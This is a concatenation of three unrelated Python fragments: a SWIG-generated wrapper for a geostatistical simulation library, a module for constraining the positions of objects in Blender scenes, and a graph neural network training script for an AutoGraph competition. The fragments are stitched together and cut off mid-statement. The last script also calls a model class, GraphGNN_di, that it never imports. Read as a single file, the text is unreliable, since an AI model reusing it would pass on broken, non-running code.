covModel = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_covModel_get, _geosclassic.mpds_geosClassicIndicatorInput_covModel_set)
__swig_setmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_set
__swig_getmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_get
if _newclass:
searchRadiusRelative = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_get, _geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_set)
__swig_setmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_set
__swig_getmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_get
if _newclass:
nneighborMax = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_get, _geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_set)
__swig_setmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_set
__swig_getmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_get
if _newclass:
searchNeighborhoodSortMode = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_get, _geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_set)
__swig_setmethods__["ndataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataImage_set
__swig_getmethods__["ndataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataImage_get
if _newclass:
ndataImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_ndataImage_get, _geosclassic.mpds_geosClassicIndicatorInput_ndataImage_set)
__swig_setmethods__["dataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_dataImage_set
__swig_getmethods__["dataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_dataImage_get
if _newclass:
dataImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_dataImage_get, _geosclassic.mpds_geosClassicIndicatorInput_dataImage_set)
__swig_setmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_set
__swig_getmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_get
if _newclass:
ndataPointSet = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_get, _geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_set)
__swig_setmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_set
__swig_getmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_get
if _newclass:
dataPointSet = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_get, _geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_set)
__swig_setmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_set
__swig_getmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_get
if _newclass:
maskImageFlag = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_get, _geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_set)
__swig_setmethods__["maskImage"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImage_set
__swig_getmethods__["maskImage"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImage_get
if _newclass:
maskImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_maskImage_get, _geosclassic.mpds_geosClassicIndicatorInput_maskImage_set)
__swig_setmethods__["probabilityUsage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_set
__swig_getmethods__["probabilityUsage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_get
if _newclass:
probabilityUsage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_get, _geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_set)
__swig_setmethods__["probabilityValue"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_set
__swig_getmethods__["probabilityValue"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_get
if _newclass:
probabilityValue = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_get, _geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_set)
__swig_setmethods__["probabilityImage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_set
__swig_getmethods__["probabilityImage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_get
if _newclass:
probabilityImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_get, _geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_set)
__swig_setmethods__["seed"] = _geosclassic.mpds_geosClassicIndicatorInput_seed_set
__swig_getmethods__["seed"] = _geosclassic.mpds_geosClassicIndicatorInput_seed_get
if _newclass:
seed = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_seed_get, _geosclassic.mpds_geosClassicIndicatorInput_seed_set)
__swig_setmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_set
__swig_getmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_get
if _newclass:
seedIncrement = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_get, _geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_set)
__swig_setmethods__["nrealization"] = _geosclassic.mpds_geosClassicIndicatorInput_nrealization_set
__swig_getmethods__["nrealization"] = _geosclassic.mpds_geosClassicIndicatorInput_nrealization_get
if _newclass:
nrealization = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_nrealization_get, _geosclassic.mpds_geosClassicIndicatorInput_nrealization_set)
def __init__(self):
this = _geosclassic.new_mpds_geosClassicIndicatorInput()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _geosclassic.delete_mpds_geosClassicIndicatorInput
__del__ = lambda self: None
mpds_geosClassicIndicatorInput_swigregister = _geosclassic.mpds_geosClassicIndicatorInput_swigregister
mpds_geosClassicIndicatorInput_swigregister(mpds_geosClassicIndicatorInput)
def MPDSGeosClassicFreeGeosClassicInput(arg1):
return _geosclassic.MPDSGeosClassicFreeGeosClassicInput(arg1)
MPDSGeosClassicFreeGeosClassicInput = _geosclassic.MPDSGeosClassicFreeGeosClassicInput
def MPDSGeosClassicFreeGeosClassicIndicatorInput(arg1):
return _geosclassic.MPDSGeosClassicFreeGeosClassicIndicatorInput(arg1)
MPDSGeosClassicFreeGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicFreeGeosClassicIndicatorInput
def MPDSGeosClassicInitGeosClassicInput(arg1):
return _geosclassic.MPDSGeosClassicInitGeosClassicInput(arg1)
MPDSGeosClassicInitGeosClassicInput = _geosclassic.MPDSGeosClassicInitGeosClassicInput
def MPDSGeosClassicInitGeosClassicIndicatorInput(arg1):
return _geosclassic.MPDSGeosClassicInitGeosClassicIndicatorInput(arg1)
MPDSGeosClassicInitGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicInitGeosClassicIndicatorInput
def MPDSGeosClassicPrintGeosClassicInput(arg1, arg2, arg3):
return _geosclassic.MPDSGeosClassicPrintGeosClassicInput(arg1, arg2, arg3)
MPDSGeosClassicPrintGeosClassicInput = _geosclassic.MPDSGeosClassicPrintGeosClassicInput
def MPDSGeosClassicPrintGeosClassicIndicatorInput(arg1, arg2, arg3):
return _geosclassic.MPDSGeosClassicPrintGeosClassicIndicatorInput(arg1, arg2, arg3)
MPDSGeosClassicPrintGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicPrintGeosClassicIndicatorInput
def MPDSGeosClassicPrintVersion(arg1, arg2, arg3, arg4, arg5):
return _geosclassic.MPDSGeosClassicPrintVersion(arg1, arg2, arg3, arg4, arg5)
MPDSGeosClassicPrintVersion = _geosclassic.MPDSGeosClassicPrintVersion
def MPDSGeosClassicValidateGeosClassicInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8):
return _geosclassic.MPDSGeosClassicValidateGeosClassicInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8)
MPDSGeosClassicValidateGeosClassicInput = _geosclassic.MPDSGeosClassicValidateGeosClassicInput
def MPDSGeosClassicValidateGeosClassicIndicatorInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8):
return _geosclassic.MPDSGeosClassicValidateGeosClassicIndicatorInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8)
MPDSGeosClassicValidateGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicValidateGeosClassicIndicatorInput
class mpds_geosClassicOutput(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, mpds_geosClassicOutput, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, mpds_geosClassicOutput, name)
__repr__ = _swig_repr
__swig_setmethods__["outputImage"] = _geosclassic.mpds_geosClassicOutput_outputImage_set
__swig_getmethods__["outputImage"] = _geosclassic.mpds_geosClassicOutput_outputImage_get
if _newclass:
outputImage = _swig_property(_geosclassic.mpds_geosClassicOutput_outputImage_get, _geosclassic.mpds_geosClassicOutput_outputImage_set)
def __init__(self):
this = _geosclassic.new_mpds_geosClassicOutput()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _geosclassic.delete_mpds_geosClassicOutput
__del__ = lambda self: None
mpds_geosClassicOutput_swigregister = _geosclassic.mpds_geosClassicOutput_swigregister
mpds_geosClassicOutput_swigregister(mpds_geosClassicOutput)
def MPDSGeosClassicFreeGeosClassicOutput(arg1):
return _geosclassic.MPDSGeosClassicFreeGeosClassicOutput(arg1)
MPDSGeosClassicFreeGeosClassicOutput = _geosclassic.MPDSGeosClassicFreeGeosClassicOutput
def MPDSGeosClassicInitGeosClassicOutput(arg1):
return _geosclassic.MPDSGeosClassicInitGeosClassicOutput(arg1)
MPDSGeosClassicInitGeosClassicOutput = _geosclassic.MPDSGeosClassicInitGeosClassicOutput
def MPDSGeosClassicBuildSearchNeighborhoodForCovModel(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18):
return _geosclassic.MPDSGeosClassicBuildSearchNeighborhoodForCovModel(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18)
MPDSGeosClassicBuildSearchNeighborhoodForCovModel = _geosclassic.MPDSGeosClassicBuildSearchNeighborhoodForCovModel
def MPDSGeosClassicIndicatorIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6):
return _geosclassic.MPDSGeosClassicIndicatorIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6)
MPDSGeosClassicIndicatorIntegrateConditioningData = _geosclassic.MPDSGeosClassicIndicatorIntegrateConditioningData
def MPDSGeosClassicIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8):
return _geosclassic.MPDSGeosClassicIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8)
MPDSGeosClassicIntegrateConditioningData = _geosclassic.MPDSGeosClassicIntegrateConditioningData
def MPDSSGeosClassicPrepareSimulationPath(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9):
return _geosclassic.MPDSSGeosClassicPrepareSimulationPath(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9)
MPDSSGeosClassicPrepareSimulationPath = _geosclassic.MPDSSGeosClassicPrepareSimulationPath
def MPDSGeosClassicSim(arg1, arg2, arg3, arg4):
return _geosclassic.MPDSGeosClassicSim(arg1, arg2, arg3, arg4)
MPDSGeosClassicSim = _geosclassic.MPDSGeosClassicSim
def MPDSGeosClassicIndicatorSim(arg1, arg2, arg3, arg4):
return _geosclassic.MPDSGeosClassicIndicatorSim(arg1, arg2, arg3, arg4)
MPDSGeosClassicIndicatorSim = _geosclassic.MPDSGeosClassicIndicatorSim
def MPDSGeosClassicIndicatorSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21):
return _geosclassic.MPDSGeosClassicIndicatorSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21)
MPDSGeosClassicIndicatorSimEstimation = _geosclassic.MPDSGeosClassicIndicatorSimEstimation
def MPDSGeosClassicIndicatorSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21, arg22):
return _geosclassic.MPDSGeosClassicIndicatorSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21, arg22)
MPDSGeosClassicIndicatorSimSimulation = _geosclassic.MPDSGeosClassicIndicatorSimSimulation
def MPDSGeosClassicSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21):
return _geosclassic.MPDSGeosClassicSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21)
MPDSGeosClassicSimEstimation = _geosclassic.MPDSGeosClassicSimEstimation
def MPDSGeosClassicSimEstimationUniqueSN(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14):
return _geosclassic.MPDSGeosClassicSimEstimationUniqueSN(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14)
MPDSGeosClassicSimEstimationUniqueSN = _geosclassic.MPDSGeosClassicSimEstimationUniqueSN
def MPDSGeosClassicSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21, arg22, arg23, arg24, arg25, arg26):
return _geosclassic.MPDSGeosClassicSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, | |
"""
Class for general constraints on random distributions.
"""
# Imports
import sys
import copy
import numpy as np
import bvp.utils as bvpu
from bvp.Classes.object import Object # Should this be here...? Unclear.
verbosity_level = 3
class Constraint(object):
"""General class to hold constraints on position, etc"""
def __init__(self, X=None):
"""General constraints (Mean, Std, Min, Max) on random distributions (rectangular or normal)
See sample_w_constr() for usage. Superordinate class for PosConstriant, ObConstraint, CamConstraint.
"""
self.X = X
def sample_w_constr(self, mu=None, sigma=None, mn=None, mx=None):
"""Get random sample given mean, std, min, max.
Parameters
----------
mu : scalar
mean of distribution
sigma : scalar
standard deviation of distribution
mn : scalar
minimum of distribution
mx : scalar
max of distribution
Notes
-----
If Mean (Input[0]) is None, returns uniform random sample, Min <= x <= Max
If Mean is not None, returns x ~N(Mean, Std), Min <= x <= Max
"""
if all([mu is None, mn is None, mx is None]):
raise ValueError('Insufficient constraints specified')
if mu is None:
n = np.random.uniform(low=mn, high=mx)
else:
if mx is None:
mx = np.inf
if mn is None:
mn = -np.inf
if sigma is None:
sigma = 1.0
n = np.random.normal(loc=mu, scale=sigma)
n = np.clip(n, mn, mx)
return n
class PosConstraint(Constraint):
"""General constraint on 3D position"""
def __init__(self, X=None, Y=None, Z=None, theta=None, phi=None, r=None, origin=(0., 0., 0.)):
"""Class to store 3D position constraints for objects / cameras / whatever in Blender.
All inputs (X, Y, ...) are 4-element tuples: (Mean, Std, Min, Max)
For rectangular X, Y, Z constraints, only specify X, Y, and Z
For spherical constraints, only specify theta, phi, and r
XYZ constraints, if present, override spherical constraints
"""
super(PosConstraint, self).__init__(X)
# Set all inputs as class properties
inpt = locals()
for i in inpt.keys():
if not i=='self':
setattr(self, i, inpt[i])
#def constr2xyz(self, ConstrObj):
def sampleXYZ(self):
"""
Sample one position (X, Y, Z) from position distribution given spherical / XYZ constraints
XYZ constraint will override spherical constraints if they are present.
ML 2012.01.31
"""
if not self.X and not self.theta:
raise Exception('Ya hafta provide either rectangular or spherical constraints on the distribution of positions!')
# Calling this within Blender, code should never get to here - location should be defined
if not self.X:
theta_offset = 270 # To make angles in Blender more interpretable
# Use spherical constraints ## THETA AND PHI MAY BE BACKWARDS FROM CONVENTION!! as is its, theta is Azimuth, phi is elevation
if not self.theta:
theta = np.random.rand()*360.
else:
theta = self.sample_w_constr(*self.theta)+theta_offset
phi = self.sample_w_constr(*self.phi)
r = self.sample_w_constr(*self.r)
# Constrain position
x, y, z = bvpu.math.sph2cart(r, theta, phi) # w/ theta, phi in degrees
x = x+self.origin[0]
y = y+self.origin[1]
z = z+self.origin[2]
else:
# Use XYZ constraints:
x = self.sample_w_constr(*self.X)
y = self.sample_w_constr(*self.Y)
z = self.sample_w_constr(*self.Z)
# Check for obstacles!
return x, y, z
class ObConstraint(PosConstraint):
"""Constraints on objects, specifically"""
def __init__(self, X=None, Y=None, Z=None,
theta=(None, None, 0., 360.), phi=(0., 0., 0., 0.), r=(0., 5., -25., 25.),
origin=(0., 0., 0.), sz=(6., 1., 3., 10.), Zrot=(None, None, -180., 180.)):
"""
Usage: ObConstraint(X=None, Y=None, Z=None,
theta=(None, None, 0., 360.), phi=(0., 0., 0., 0.), r=(0., 5., -25., 25.),
origin=(0., 0., 0.), Sz=(6., 1., 3., 10.), zRot=(None, None, -180., 180.))
Class to store 3D position constraints for objects
All inputs (X, Y, ...) are 4-element lists: [Mean, Std, Min, Max]
For rectangular X, Y, Z constraints, only specify X, Y, and Z
For spherical constraints, only specify theta, phi, and r
"Obst" is a list of Objects (with a size and position) that
are to be avoided in positioning objects
ML 2012.10
"""
self.type = 'ObConstraint'
super(ObConstraint, self).__init__(X=X, Y=Y, Z=Z, theta=theta, phi=phi, r=r, origin=origin)
# Set all inputs as class properties
Inputs = locals()
for i in Inputs.keys():
if not i=='self':
setattr(self, i, Inputs[i])
def checkXYZS_3D(self, Ob, Obst=None, CheckBounds=True):
"""
Verify that a particular position and size is acceptable given "Obst" obstacles and
the position constraints of this object (in 3-D).
Inputs:
Ob = the object being placed
Obst = list of "Object" instances to specify positions of obstacles to avoid
Returns:
BGboundOK = boolean; True if XYZpos is within boundary constraints
ObDistOK = boolean; True if XYZpos does not overlap with other objects/obstacles
"""
# (1) Check distance from allowable object position boundaries (X, Y, and/or r)
BGboundOK_3D = [True, True, True, True]
if CheckBounds:
minXYZpos = Ob.min_xyz_pos
maxXYZpos = Ob.max_xyz_pos
Sz = Ob.size3D
tolerance_factor = 5
X_OK, Y_OK, r_OK, Z_OK = True, True, True, True # True by default
#TODO: What is the correct way to take object size into account?
if self.X:
xA = True if self.X[2] is None else (minXYZpos[0]>=self.X[2])
xB = True if self.X[3] is None else (maxXYZpos[0]<=self.X[3])
X_OK = xA and xB
if self.Y:
yA = True if self.Y[2] is None else (minXYZpos[1]>=self.Y[2])
yB = True if self.Y[3] is None else (maxXYZpos[1]<=self.Y[3])
Y_OK = yA and yB
if self.Z:
if self.Z[2] == self.Z[3]:
zA = True if self.Z[2] is None else (minXYZpos[2] >= self.Z[2]-Sz/tolerance_factor)
zB = True if self.Z[2] is None else (maxXYZpos[2] <= self.Z[3] + self.Sz[3] - Sz)
else:
zA = True if self.Z[2] is None else (minXYZpos[2]>=self.Z[2]-Sz/tolerance_factor)
zB = True if self.Z[3] is None else (maxXYZpos[2]<=self.Z[3])
Z_OK = (zA and zB)
if self.r:
oX, oY, oZ = self.origin
maxR = ((maxXYZpos[0]-oX)**2 + (maxXYZpos[1]-oY)**2 + (maxXYZpos[2]-oZ)**2)**.5
minR = ((minXYZpos[0]-oX)**2 + (minXYZpos[1]-oY)**2 + (minXYZpos[2]-oZ)**2)**.5
rA = True if self.r[2] is None else (minR)>=self.r[2]
rB = True if self.r[3] is None else (maxR)<=self.r[3]
r_OK = rA and rB
BGboundOK_3D = [X_OK, Y_OK, Z_OK, r_OK] # all([...])
# (2) Check distance from other objects in 3D
if Obst is not None:
nObj = len(Obst)
else:
nObj = 0
ObDstOK_3D = [True]*nObj
for c in range(nObj):
# print(Obst[c])
ObDstOK_3D[c] = not Ob.collides_with(Obst[c])
return BGboundOK_3D, ObDstOK_3D
def checkXYZS_2D(self, Ob, Cam, Obst=None, EdgeDist=0., ObOverlap=50.):
"""
Verify that a particular position and size is acceptable given "Obst" obstacles and
the position constraints of this object (in 2D images space).
Inputs:
Ob = the object being placed
Cam = Camera object (for computing perspective)
Obst = list of "Object" instances to specify positions of obstacles to avoid
EdgeDist = proportion of object that can go outside of the 2D image (0.-100.)
ObOverlap = proportion of object that can overlap with other objects (0.-100.)
Returns:
ImBoundOK = boolean; True if 2D projection of XYZpos is less than (EdgeDist) outside of image boundary
ObDistOK = boolean; True if 2D projection of XYZpos overlaps less than (ObOverlap) with other objects/obstacles
"""
# (TODO: Make flexible for EdgeDist, ObOverlap being 0-1 or 0-100?)
#TODO: Currently only looks at object one_wall_distances in the first frame. It is computationally hard, and possibly unnecessary to check it for every frame.
edge_ok_list = []
obdst_ok_list = []
ob_positions = Ob.xyz_trajectory
num_frames = len(ob_positions)
cam_frames_idx = np.floor(np.linspace(0, Cam.frames[-1], num_frames, endpoint = True)).astype(np.int) #select 5 equally spaced camera frames
cam_fix_location = list(np.array([np.linspace(Cam.fix_location[0][i], Cam.fix_location[-1][i],Cam.frames[-1]) for i in range(3)]).T) #interpolate cam fixation location for those frames
cam_location = list(np.array([np.linspace(Cam.location[0][i], Cam.location[-1][i], Cam.frames[-1]) for i in range(3)]).T) #same for camera position
for frame_num in range(num_frames):
object_pos = ob_positions[frame_num]
TmpOb = Object(pos3D=object_pos, size3D=Ob.size3D)
tmpIP_Top, tmpIP_Bot, tmpIP_L, tmpIP_R = bvpu.math.perspective_projection(TmpOb, Cam, ImSz=(100, 100),cam_location=cam_location[frame_num],cam_fix_location= cam_fix_location[frame_num],cam_lens = Cam.lens)
TmpObSz_X = abs(tmpIP_R[0]-tmpIP_L[0])
TmpObSz_Y = abs(tmpIP_Bot[1]-tmpIP_Top[1])
TmpImPos = [np.mean([tmpIP_R[0], tmpIP_L[0]]), np.mean([tmpIP_Bot[1], tmpIP_Top[1]])]
### --- (1) Check distance from screen edges --- ###
Top_OK = EdgeDist < tmpIP_Top[1]
Bot_OK = 100-EdgeDist > tmpIP_Bot[1]
L_OK = EdgeDist < tmpIP_L[0]
R_OK = 100-EdgeDist > tmpIP_R[0]
EdgeOK_2D = all([Top_OK, Bot_OK, L_OK, R_OK])
### --- (2) Check distance from other objects in 2D --- ###
if Obst:
nObj = len(Obst)
else:
nObj = 0
obstPos2D_List = []
Dist_List = []
Dthresh_List = []
ObstSz_List = []
ObDstOK_2D = [True for x in range(nObj)]
for c in range(nObj):
| |
<reponame>hxttkl/KDD_CUP_AutoGraph_AutoEnsemble
from __future__ import with_statement # Required in 2.5
import torch
import torch.nn.functional as F
from sub_models import GatedGNN
from sub_models import GatedGCN
from sub_models_di import GatedGNN_di
from sub_models_di import GatedGIN_di
from sub_models import GatedGIN
from sub_models import Lin2_APPNP
from sub_models import GCN_APPNP
from sub_models import StopEarly
from sub_models import GIN
from sub_models import GCN
from sub_models import GAT
from sub_models import ARMA
from sub_models import GMM
from sub_models import GraphGNN
from sub_models import MF
from sub_models import AGNN
from sub_models import SAGE
import xgboost as xgb
from xgboost import XGBClassifier
from sklearn.ensemble import RandomForestClassifier
import time
import gc
import signal
from contextlib import contextmanager
class TimeoutException(Exception): pass
def random_weight(num):
weight = torch.rand(num)
weight = weight + 0.5
weight = weight.view(weight.shape[0], 1)
#print(weight)
return weight
@contextmanager
def time_limit(seconds):
def signal_handler(signum, frame):
raise TimeoutException
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(seconds)
try:
yield
finally:
signal.alarm(0)
def rf_train(train_x,train_y,test_x):
rf1 = RandomForestClassifier(n_jobs=4, n_estimators=600, random_state=123)
rf1.fit(train_x, train_y)
y_pred = rf1.predict_proba(test_x)
return y_pred
def label_train_and_predict(data, sample_mask, val_mask, node_norm,time_control):
data = data.to('cpu')
x = data.feature.cpu().numpy()
train_y = data.y[sample_mask.cpu()].numpy()
train_x = x[sample_mask.cpu(), :]
start = time.time()
try:
with time_limit(time_control.get_remain_time()):
y_pred = rf_train(train_x,train_y,x)
elapsed = (time.time() - start)
print("label训练时间", elapsed)
y_pred = torch.tensor(y_pred, dtype=torch.float)
y_pred = F.log_softmax(y_pred, dim=-1).numpy()
return y_pred
except TimeoutException:
print( "Timed out!")
return None
def gcn_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control,hidden):
num_class = int(max(data.y)) + 1
model = GCN(features_num=data.x.size()[1],num_class=num_class,hidden=hidden,num_layers=2)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def gated_train(data, aggr, sample_mask, val_mask, node_norm, device, time_control,hidden,conv_aggr):
num_class = int(max(data.y)) + 1
model = GatedGCN(features_num=data.x.size()[1],num_class=num_class,hidden=hidden,num_layers=2,aggr=conv_aggr)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def graphnn_train(data, aggr, sample_mask, val_mask, node_norm, device,time_control):
num_class = int(max(data.y)) + 1
model = GraphGNN(features_num=data.x.size()[1],num_class=num_class,hidden=64,num_layers=2)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def graphnn_di_train(data, aggr, sample_mask, val_mask, node_norm, device,time_control):
num_class = int(max(data.y)) + 1
model = GraphGNN_di(features_num=data.x.size()[1],num_class=num_class,hidden=64,num_layers=2)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
